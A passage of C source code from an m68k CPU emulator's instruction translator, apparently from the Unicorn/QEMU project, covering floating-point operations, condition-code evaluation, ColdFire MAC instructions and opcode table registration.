tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x1d: /* fcos */ gen_helper_fcos(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x1e: /* fgetexp */ gen_helper_fgetexp(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x1f: /* fgetman */ gen_helper_fgetman(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x20: /* fdiv */ gen_helper_fdiv(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x60: /* fsdiv */ gen_helper_fsdiv(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x64: /* fddiv */ gen_helper_fddiv(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x21: /* fmod */ gen_helper_fmod(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x22: /* fadd */ gen_helper_fadd(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x62: /* fsadd */ gen_helper_fsadd(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x66: /* fdadd */ gen_helper_fdadd(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x23: /* fmul */ gen_helper_fmul(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x63: /* fsmul */ gen_helper_fsmul(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x67: /* fdmul */ gen_helper_fdmul(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x24: /* fsgldiv */ gen_helper_fsgldiv(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x25: /* frem */ gen_helper_frem(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x26: /* fscale */ gen_helper_fscale(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x27: /* fsglmul */ gen_helper_fsglmul(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x28: /* fsub */ gen_helper_fsub(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x68: /* fssub */ gen_helper_fssub(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x6c: /* fdsub */ gen_helper_fdsub(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x30: case 0x31: case 0x32: case 0x33: case 0x34: case 0x35: case 0x36: case 0x37: { TCGv_ptr cpu_dest2 = gen_fp_ptr(tcg_ctx, REG(ext, 0)); gen_helper_fsincos(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_dest2, cpu_src); tcg_temp_free_ptr(tcg_ctx, cpu_dest2); } break; case 0x38: /* fcmp */ gen_helper_fcmp(tcg_ctx, tcg_ctx->cpu_env, cpu_src, cpu_dest); return; case 0x3a: /* ftst */ gen_helper_ftst(tcg_ctx, tcg_ctx->cpu_env, cpu_src); return; default: goto undef; } tcg_temp_free_ptr(tcg_ctx, cpu_src); gen_helper_ftst(tcg_ctx, tcg_ctx->cpu_env, cpu_dest); tcg_temp_free_ptr(tcg_ctx, cpu_dest); return; undef: /* FIXME: Is this right for offset addressing modes? */ s->pc -= 2; disas_undef_fpu(env, s, insn); } static void gen_fcc_cond(DisasCompare *c, DisasContext *s, int cond) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv fpsr; c->g1 = 1; c->v2 = tcg_const_i32(tcg_ctx, 0); c->g2 = 0; /* TODO: Raise BSUN exception. */ fpsr = tcg_temp_new(tcg_ctx); gen_load_fcr(s, fpsr, M68K_FPSR); switch (cond) { case 0: /* False */ case 16: /* Signaling False */ c->v1 = c->v2; c->tcond = TCG_COND_NEVER; break; case 1: /* EQual Z */ case 17: /* Signaling EQual Z */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_Z); c->tcond = TCG_COND_NE; break; case 2: /* Ordered Greater Than !(A || Z || N) */ case 18: /* Greater Than !(A || Z || N) */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A | FPSR_CC_Z | FPSR_CC_N); c->tcond = TCG_COND_EQ; break; case 3: /* Ordered Greater than or Equal Z || !(A || N) */ case 19: /* Greater than or Equal Z || !(A || N) */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A); tcg_gen_shli_i32(tcg_ctx, c->v1, c->v1, ctz32(FPSR_CC_N) - ctz32(FPSR_CC_A)); tcg_gen_andi_i32(tcg_ctx, fpsr, fpsr, FPSR_CC_Z | FPSR_CC_N); tcg_gen_or_i32(tcg_ctx, c->v1, c->v1, fpsr); tcg_gen_xori_i32(tcg_ctx, c->v1, c->v1, FPSR_CC_N); c->tcond = TCG_COND_NE; break; case 4: /* Ordered Less Than !(!N || A || Z); */ case 20: /* Less Than !(!N || A || Z); */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_xori_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_N); tcg_gen_andi_i32(tcg_ctx, c->v1, c->v1, FPSR_CC_N | FPSR_CC_A | FPSR_CC_Z); c->tcond = TCG_COND_EQ; break; case 5: /* Ordered Less than or Equal Z || (N && !A) */ case 21: /* Less than or Equal Z || (N && !A) */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A); tcg_gen_shli_i32(tcg_ctx, c->v1, c->v1, ctz32(FPSR_CC_N) - ctz32(FPSR_CC_A)); tcg_gen_andc_i32(tcg_ctx, c->v1, fpsr, c->v1); tcg_gen_andi_i32(tcg_ctx, c->v1, c->v1, FPSR_CC_Z | FPSR_CC_N); c->tcond = TCG_COND_NE; break; case 6: /* Ordered Greater or Less than !(A || Z) */ case 22: /* Greater or Less than !(A || Z) */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A | FPSR_CC_Z); c->tcond = TCG_COND_EQ; break; case 7: /* Ordered !A */ case 23: /* Greater, Less or Equal !A */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A); c->tcond = TCG_COND_EQ; break; case 8: /* Unordered A */ case 24: /* Not Greater, Less or Equal A */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A); c->tcond = TCG_COND_NE; break; case 9: /* Unordered or Equal A || Z */ case 25: /* Not Greater or Less then A || Z */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A | FPSR_CC_Z); c->tcond = TCG_COND_NE; break; case 10: /* Unordered or Greater Than A || !(N || Z)) */ case 26: /* Not Less or Equal A || !(N || Z)) */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_Z); tcg_gen_shli_i32(tcg_ctx, c->v1, c->v1, ctz32(FPSR_CC_N) - ctz32(FPSR_CC_Z)); tcg_gen_andi_i32(tcg_ctx, fpsr, fpsr, FPSR_CC_A | FPSR_CC_N); tcg_gen_or_i32(tcg_ctx, c->v1, c->v1, fpsr); tcg_gen_xori_i32(tcg_ctx, c->v1, c->v1, FPSR_CC_N); c->tcond = TCG_COND_NE; break; case 11: /* Unordered or Greater or Equal A || Z || !N */ case 27: /* Not Less Than A || Z || !N */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A | FPSR_CC_Z | FPSR_CC_N); tcg_gen_xori_i32(tcg_ctx, c->v1, c->v1, FPSR_CC_N); c->tcond = TCG_COND_NE; break; case 12: /* Unordered or Less Than A || (N && !Z) */ case 28: /* Not Greater than or Equal A || (N && !Z) */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_Z); tcg_gen_shli_i32(tcg_ctx, c->v1, c->v1, ctz32(FPSR_CC_N) - ctz32(FPSR_CC_Z)); tcg_gen_andc_i32(tcg_ctx, c->v1, fpsr, c->v1); tcg_gen_andi_i32(tcg_ctx, c->v1, c->v1, FPSR_CC_A | FPSR_CC_N); c->tcond = TCG_COND_NE; break; case 13: /* Unordered or Less or Equal A || Z || N */ case 29: /* Not Greater Than A || Z || N */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A | FPSR_CC_Z | FPSR_CC_N); c->tcond = TCG_COND_NE; break; case 14: /* Not Equal !Z */ case 30: /* Signaling Not Equal !Z */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_Z); c->tcond = TCG_COND_EQ; break; case 15: /* True */ case 31: /* Signaling True */ c->v1 = c->v2; c->tcond = TCG_COND_ALWAYS; break; } tcg_temp_free(tcg_ctx, fpsr); } static void gen_fjmpcc(DisasContext *s, int cond, TCGLabel *l1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare c; gen_fcc_cond(&c, s, cond); update_cc_op(s); tcg_gen_brcond_i32(tcg_ctx, c.tcond, c.v1, c.v2, l1); free_cond(tcg_ctx, &c); } DISAS_INSN(fbcc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t offset; uint32_t base; TCGLabel *l1; base = s->pc; offset = (int16_t)read_im16(env, s); if (insn & (1 << 6)) { offset = (offset << 16) | read_im16(env, s); } l1 = gen_new_label(tcg_ctx); update_cc_op(s); gen_fjmpcc(s, insn & 0x3f, l1); gen_jmp_tb(s, 0, s->pc); gen_set_label(tcg_ctx, l1); gen_jmp_tb(s, 1, base + offset); } DISAS_INSN(fscc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare c; int cond; TCGv tmp; uint16_t ext; ext = read_im16(env, s); cond = ext & 0x3f; gen_fcc_cond(&c, s, cond); tmp = tcg_temp_new(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, c.tcond, tmp, c.v1, c.v2); free_cond(tcg_ctx, &c); tcg_gen_neg_i32(tcg_ctx, tmp, tmp); DEST_EA(env, insn, OS_BYTE, tmp, NULL); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(frestore) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } if (m68k_feature(s->env, M68K_FEATURE_M68040)) { SRC_EA(env, addr, OS_LONG, 0, NULL); /* FIXME: check the state frame */ } else { disas_undef(env, s, insn); } } DISAS_INSN(fsave) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } if (m68k_feature(s->env, M68K_FEATURE_M68040)) { /* always write IDLE */ TCGv idle = tcg_const_i32(tcg_ctx, 0x41000000); DEST_EA(env, insn, OS_LONG, idle, NULL); tcg_temp_free(tcg_ctx, idle); } else { disas_undef(env, s, insn); } } static inline TCGv gen_mac_extract_word(DisasContext *s, TCGv val, int upper) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp = tcg_temp_new(tcg_ctx); if (s->env->macsr & MACSR_FI) { if (upper) tcg_gen_andi_i32(tcg_ctx, tmp, val, 0xffff0000); else tcg_gen_shli_i32(tcg_ctx, tmp, val, 16); } else if (s->env->macsr & MACSR_SU) { if (upper) tcg_gen_sari_i32(tcg_ctx, tmp, val, 16); else tcg_gen_ext16s_i32(tcg_ctx, tmp, val); } else { if (upper) tcg_gen_shri_i32(tcg_ctx, tmp, val, 16); else tcg_gen_ext16u_i32(tcg_ctx, tmp, val); } return tmp; } static void gen_mac_clear_flags(TCGContext *tcg_ctx) { tcg_gen_andi_i32(tcg_ctx, QREG_MACSR, QREG_MACSR, ~(MACSR_V | MACSR_Z | MACSR_N | MACSR_EV)); } DISAS_INSN(mac) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv rx; TCGv ry; uint16_t ext; int acc; TCGv tmp; TCGv addr; TCGv loadval; int dual; TCGv saved_flags; if (!s->done_mac) { s->mactmp = tcg_temp_new_i64(tcg_ctx); s->done_mac = 1; } ext = read_im16(env, s); acc = ((insn >> 7) & 1) | ((ext >> 3) & 2); dual = ((insn & 0x30) != 0 && (ext & 3) != 0); if (dual && !m68k_feature(s->env, M68K_FEATURE_CF_EMAC_B)) { disas_undef(env, s, insn); return; } if (insn & 0x30) { /* MAC with load. */ tmp = gen_lea(env, s, insn, OS_LONG); addr = tcg_temp_new(tcg_ctx); tcg_gen_and_i32(tcg_ctx, addr, tmp, QREG_MAC_MASK); /* * Load the value now to ensure correct exception behavior. * Perform writeback after reading the MAC inputs. */ loadval = gen_load(s, OS_LONG, addr, 0, IS_USER(s)); acc ^= 1; rx = (ext & 0x8000) ? AREG(ext, 12) : DREG(insn, 12); ry = (ext & 8) ? AREG(ext, 0) : DREG(ext, 0); } else { loadval = addr = tcg_ctx->NULL_QREG; rx = (insn & 0x40) ? AREG(insn, 9) : DREG(insn, 9); ry = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); } gen_mac_clear_flags(tcg_ctx); #if 0 l1 = -1; /* Disabled because conditional branches clobber temporary vars. */ if ((s->env->macsr & MACSR_OMC) != 0 && !dual) { /* Skip the multiply if we know we will ignore it. */ l1 = gen_new_label(tcg_ctx); tmp = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, tmp, QREG_MACSR, 1 << (acc + 8)); gen_op_jmp_nz32(tmp, l1); } #endif if ((ext & 0x0800) == 0) { /* Word. */ rx = gen_mac_extract_word(s, rx, (ext & 0x80) != 0); ry = gen_mac_extract_word(s, ry, (ext & 0x40) != 0); } if (s->env->macsr & MACSR_FI) { gen_helper_macmulf(tcg_ctx, s->mactmp, tcg_ctx->cpu_env, rx, ry); } else { if (s->env->macsr & MACSR_SU) gen_helper_macmuls(tcg_ctx, s->mactmp, tcg_ctx->cpu_env, rx, ry); else gen_helper_macmulu(tcg_ctx, s->mactmp, tcg_ctx->cpu_env, rx, ry); switch ((ext >> 9) & 3) { case 1: tcg_gen_shli_i64(tcg_ctx, s->mactmp, s->mactmp, 1); break; case 3: tcg_gen_shri_i64(tcg_ctx, s->mactmp, s->mactmp, 1); break; } } if (dual) { /* Save the overflow flag from the multiply. */ saved_flags = tcg_temp_new(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, saved_flags, QREG_MACSR); } else { saved_flags = tcg_ctx->NULL_QREG; } #if 0 /* Disabled because conditional branches clobber temporary vars. */ if ((s->env->macsr & MACSR_OMC) != 0 && dual) { /* Skip the accumulate if the value is already saturated. */ l1 = gen_new_label(tcg_ctx); tmp = tcg_temp_new(tcg_ctx); gen_op_and32(tmp, QREG_MACSR, tcg_const_i32(tcg_ctx, MACSR_PAV0 << acc)); gen_op_jmp_nz32(tmp, l1); } #endif if (insn & 0x100) tcg_gen_sub_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); else tcg_gen_add_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); if (s->env->macsr & MACSR_FI) gen_helper_macsatf(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); else if (s->env->macsr & MACSR_SU) gen_helper_macsats(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); else gen_helper_macsatu(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); #if 0 /* Disabled because conditional branches clobber temporary vars. */ if (l1 != -1) gen_set_label(tcg_ctx, l1); #endif if (dual) { /* Dual accumulate variant. */ acc = (ext >> 2) & 3; /* Restore the overflow flag from the multiplier. */ tcg_gen_mov_i32(tcg_ctx, QREG_MACSR, saved_flags); #if 0 /* Disabled because conditional branches clobber temporary vars. */ if ((s->env->macsr & MACSR_OMC) != 0) { /* Skip the accumulate if the value is already saturated. */ l1 = gen_new_label(tcg_ctx); tmp = tcg_temp_new(tcg_ctx); gen_op_and32(tmp, QREG_MACSR, tcg_const_i32(tcg_ctx, MACSR_PAV0 << acc)); gen_op_jmp_nz32(tmp, l1); } #endif if (ext & 2) tcg_gen_sub_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); else tcg_gen_add_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); if (s->env->macsr & MACSR_FI) gen_helper_macsatf(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); else if (s->env->macsr & MACSR_SU) gen_helper_macsats(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); else gen_helper_macsatu(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); #if 0 /* Disabled because conditional branches clobber temporary vars. */ if (l1 != -1) gen_set_label(tcg_ctx, l1); #endif } gen_helper_mac_set_flags(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); if (insn & 0x30) { TCGv rw; rw = (insn & 0x40) ? AREG(insn, 9) : DREG(insn, 9); tcg_gen_mov_i32(tcg_ctx, rw, loadval); /* * FIXME: Should address writeback happen with the masked or * unmasked value? */ switch ((insn >> 3) & 7) { case 3: /* Post-increment. */ tcg_gen_addi_i32(tcg_ctx, AREG(insn, 0), addr, 4); break; case 4: /* Pre-decrement. */ tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), addr); } tcg_temp_free(tcg_ctx, loadval); } } DISAS_INSN(from_mac) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv rx; TCGv_i64 acc; int accnum; rx = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); accnum = (insn >> 9) & 3; acc = MACREG(accnum); if (s->env->macsr & MACSR_FI) { gen_helper_get_macf(tcg_ctx, rx, tcg_ctx->cpu_env, acc); } else if ((s->env->macsr & MACSR_OMC) == 0) { tcg_gen_extrl_i64_i32(tcg_ctx, rx, acc); } else if (s->env->macsr & MACSR_SU) { gen_helper_get_macs(tcg_ctx, rx, acc); } else { gen_helper_get_macu(tcg_ctx, rx, acc); } if (insn & 0x40) { tcg_gen_movi_i64(tcg_ctx, acc, 0); tcg_gen_andi_i32(tcg_ctx, QREG_MACSR, QREG_MACSR, ~(MACSR_PAV0 << accnum)); } } DISAS_INSN(move_mac) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* FIXME: This can be done without a helper. */ int src; TCGv dest; src = insn & 3; dest = tcg_const_i32(tcg_ctx, (insn >> 9) & 3); gen_helper_mac_move(tcg_ctx, tcg_ctx->cpu_env, dest, tcg_const_i32(tcg_ctx, src)); gen_mac_clear_flags(tcg_ctx); gen_helper_mac_set_flags(tcg_ctx, tcg_ctx->cpu_env, dest); } DISAS_INSN(from_macsr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; reg = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); tcg_gen_mov_i32(tcg_ctx, reg, QREG_MACSR); } DISAS_INSN(from_mask) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; reg = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); tcg_gen_mov_i32(tcg_ctx, reg, QREG_MAC_MASK); } DISAS_INSN(from_mext) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv acc; reg = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); acc = tcg_const_i32(tcg_ctx, (insn & 0x400) ? 2 : 0); if (s->env->macsr & MACSR_FI) gen_helper_get_mac_extf(tcg_ctx, reg, tcg_ctx->cpu_env, acc); else gen_helper_get_mac_exti(tcg_ctx, reg, tcg_ctx->cpu_env, acc); } DISAS_INSN(macsr_to_ccr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, tmp, QREG_MACSR, 0xf); gen_helper_set_sr(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free(tcg_ctx, tmp); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(to_mac) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 acc; TCGv val; int accnum; accnum = (insn >> 9) & 3; acc = MACREG(accnum); SRC_EA(env, val, OS_LONG, 0, NULL); if (s->env->macsr & MACSR_FI) { tcg_gen_ext_i32_i64(tcg_ctx, acc, val); tcg_gen_shli_i64(tcg_ctx, acc, acc, 8); } else if (s->env->macsr & MACSR_SU) { tcg_gen_ext_i32_i64(tcg_ctx, acc, val); } else { tcg_gen_extu_i32_i64(tcg_ctx, acc, val); } tcg_gen_andi_i32(tcg_ctx, QREG_MACSR, QREG_MACSR, ~(MACSR_PAV0 << accnum)); gen_mac_clear_flags(tcg_ctx); gen_helper_mac_set_flags(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, accnum)); } DISAS_INSN(to_macsr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv val; SRC_EA(env, val, OS_LONG, 0, NULL); gen_helper_set_macsr(tcg_ctx, tcg_ctx->cpu_env, val); gen_exit_tb(s); } DISAS_INSN(to_mask) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv val; SRC_EA(env, val, OS_LONG, 0, NULL); tcg_gen_ori_i32(tcg_ctx, QREG_MAC_MASK, val, 0xffff0000); } DISAS_INSN(to_mext) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv val; TCGv acc; SRC_EA(env, val, OS_LONG, 0, NULL); acc = tcg_const_i32(tcg_ctx, (insn & 0x400) ? 2 : 0); if (s->env->macsr & MACSR_FI) gen_helper_set_mac_extf(tcg_ctx, tcg_ctx->cpu_env, val, acc); else if (s->env->macsr & MACSR_SU) gen_helper_set_mac_exts(tcg_ctx, tcg_ctx->cpu_env, val, acc); else gen_helper_set_mac_extu(tcg_ctx, tcg_ctx->cpu_env, val, acc); } static disas_proc opcode_table[65536]; static void register_opcode (disas_proc proc, uint16_t opcode, uint16_t mask) { int i; int from; int to; /* Sanity check. All set bits must be included in the mask. */ if (opcode & ~mask) { fprintf(stderr, "qemu internal error: bogus opcode definition %04x/%04x\n", opcode, mask); abort(); } /* * This could probably be cleverer. For now just optimize the case where * the top bits are known. */ /* Find the first zero bit in the mask. */ i = 0x8000; while ((i & mask) != 0) i >>= 1; /* Iterate over all combinations of this and lower bits. */ if (i == 0) i = 1; else i <<= 1; from = opcode & ~(i - 1); to = from + i; for (i = from; i < to; i++) { if ((i & mask) == opcode) opcode_table[i] = proc; } } /* * Register m68k opcode handlers. Order is important. * Later insn override earlier ones. */ void register_m68k_insns (CPUM68KState *env) { /* * Build the opcode table only once to avoid * multithreading issues. */ if (opcode_table[0] != NULL) { return; } /* * use BASE() for instruction available * for CF_ISA_A and M68000. */ #define BASE(name, opcode, mask) \ register_opcode(disas_##name, 0x##opcode, 0x##mask) #define INSN(name, opcode, mask, feature) do { \ if (m68k_feature(env, M68K_FEATURE_##feature)) \ BASE(name, opcode, mask); \ } while(0) BASE(undef, 0000, 0000); INSN(arith_im, 0080, fff8, CF_ISA_A); INSN(arith_im, 0000, ff00, M68000); INSN(chk2, 00c0, f9c0, CHK2); INSN(bitrev, 00c0, fff8, CF_ISA_APLUSC); BASE(bitop_reg, 0100, f1c0); BASE(bitop_reg, 0140, f1c0); BASE(bitop_reg, 0180, f1c0); BASE(bitop_reg, 01c0, f1c0); INSN(movep, 0108, f138, MOVEP); INSN(arith_im, 0280, fff8, CF_ISA_A); INSN(arith_im, 0200, ff00, M68000); INSN(undef, 02c0, ffc0, M68000); INSN(byterev, 02c0, fff8, CF_ISA_APLUSC); INSN(arith_im, 0480, fff8, CF_ISA_A); INSN(arith_im, 0400, ff00, M68000); INSN(undef, 04c0, ffc0, M68000); INSN(arith_im, 0600, ff00, M68000); INSN(undef, 06c0, ffc0, M68000); INSN(ff1, 04c0, fff8, CF_ISA_APLUSC); INSN(arith_im, 0680, fff8, CF_ISA_A); INSN(arith_im, 0c00, ff38, CF_ISA_A); INSN(arith_im, 0c00, ff00, M68000); BASE(bitop_im, 0800, ffc0); BASE(bitop_im, 0840, ffc0); BASE(bitop_im, 0880, ffc0); BASE(bitop_im, 08c0, ffc0); INSN(arith_im, 0a80, fff8, CF_ISA_A); INSN(arith_im, 0a00, ff00, M68000); INSN(moves, 0e00, ff00, M68000); INSN(cas, 0ac0, ffc0, CAS); INSN(cas, 0cc0, ffc0, CAS); INSN(cas, 0ec0, ffc0, CAS); INSN(cas2w, 0cfc, ffff, CAS); INSN(cas2l, 0efc, ffff, CAS); BASE(move, 1000, f000); BASE(move, 2000, f000); BASE(move, 3000, f000); INSN(chk, 4000, f040, M68000); INSN(strldsr, 40e7, ffff, CF_ISA_APLUSC); INSN(negx, 4080, fff8, CF_ISA_A); INSN(negx, 4000, ff00, M68000); INSN(undef, 40c0, ffc0, M68000); INSN(move_from_sr, 40c0, fff8, CF_ISA_A); INSN(move_from_sr, 40c0, ffc0, M68000); BASE(lea, 41c0, f1c0); BASE(clr, 4200, ff00); BASE(undef, 42c0, ffc0); INSN(move_from_ccr, 42c0, fff8, CF_ISA_A); INSN(move_from_ccr, 42c0, ffc0, M68000); INSN(neg, 4480, fff8, CF_ISA_A); INSN(neg, 4400, ff00, M68000); INSN(undef, 44c0, ffc0, M68000); BASE(move_to_ccr, 44c0, ffc0); INSN(not, 4680, fff8, CF_ISA_A); INSN(not, 4600, ff00, M68000); BASE(move_to_sr, 46c0, ffc0); INSN(nbcd, 4800, ffc0, M68000); INSN(linkl, 4808, fff8, M68000); BASE(pea, 4840, ffc0); BASE(swap, 4840, fff8); INSN(bkpt, 4848, fff8, BKPT); INSN(movem, 48d0, fbf8, CF_ISA_A); INSN(movem, 48e8, fbf8, CF_ISA_A); INSN(movem, 4880, fb80, M68000); BASE(ext, 4880, fff8); BASE(ext, 48c0, fff8); BASE(ext, 49c0, fff8); BASE(tst, 4a00, ff00); INSN(tas, 4ac0, ffc0, CF_ISA_B); INSN(tas, 4ac0, ffc0, M68000); INSN(halt, 4ac8, ffff, CF_ISA_A); INSN(pulse, 4acc, ffff, CF_ISA_A); BASE(illegal, 4afc, ffff); INSN(mull, 4c00, ffc0, CF_ISA_A); INSN(mull, 4c00, ffc0, LONG_MULDIV); INSN(divl, 4c40, ffc0, CF_ISA_A); INSN(divl, 4c40, ffc0, LONG_MULDIV); INSN(sats, 4c80, fff8, CF_ISA_B); BASE(trap, 4e40, fff0); BASE(link, 4e50, fff8); BASE(unlk, 4e58, fff8); INSN(move_to_usp, 4e60, fff8, USP); INSN(move_from_usp, 4e68, fff8, USP); INSN(reset, 4e70, ffff, M68000); BASE(stop, 4e72, ffff); BASE(rte, 4e73, ffff); INSN(cf_movec, 4e7b, ffff, CF_ISA_A); INSN(m68k_movec, 4e7a, fffe, M68000); BASE(nop, 4e71, ffff); INSN(rtd, 4e74, ffff, RTD); BASE(rts, 4e75, ffff); BASE(jump, 4e80, ffc0); BASE(jump, 4ec0, ffc0); INSN(addsubq, 5000, f080, M68000); BASE(addsubq, 5080, f0c0); INSN(scc, 50c0, f0f8, CF_ISA_A); /* Scc.B Dx */ INSN(scc, 50c0, f0c0, M68000); /* Scc.B <EA> */ INSN(dbcc, 50c8, f0f8, M68000); INSN(tpf, 51f8, fff8, CF_ISA_A); /* Branch instructions. */ BASE(branch, 6000, f000); /* Disable long branch instructions, then add back the ones we want. */ BASE(undef, 60ff, f0ff); /* All long branches. */ INSN(branch, 60ff, f0ff, CF_ISA_B); INSN(undef, 60ff, ffff, CF_ISA_B); /* bra.l */ INSN(branch, 60ff, ffff, BRAL); INSN(branch, 60ff, f0ff, BCCL); BASE(moveq, 7000, f100); INSN(mvzs, 7100, f100, CF_ISA_B); BASE(or, 8000, f000); BASE(divw, 80c0, f0c0); INSN(sbcd_reg, 8100, f1f8, M68000); INSN(sbcd_mem, 8108, f1f8, M68000); BASE(addsub, 9000, f000); INSN(undef, 90c0, f0c0, CF_ISA_A); INSN(subx_reg, 9180, f1f8, CF_ISA_A); INSN(subx_reg, 9100, f138, M68000); INSN(subx_mem, 9108, f138, M68000); INSN(suba, 91c0, f1c0, CF_ISA_A); INSN(suba, 90c0, f0c0, M68000); BASE(undef_mac, a000, f000); INSN(mac, a000, f100, CF_EMAC); INSN(from_mac, a180, f9b0, CF_EMAC); INSN(move_mac, a110, f9fc, CF_EMAC); INSN(from_macsr,a980, f9f0, CF_EMAC); INSN(from_mask, ad80, fff0, CF_EMAC); INSN(from_mext, ab80, fbf0, CF_EMAC); INSN(macsr_to_ccr, a9c0, ffff, CF_EMAC); INSN(to_mac, a100, f9c0, CF_EMAC); INSN(to_macsr, a900, ffc0, CF_EMAC); INSN(to_mext, ab00, fbc0, CF_EMAC); INSN(to_mask, ad00, ffc0, CF_EMAC); INSN(mov3q, a140, 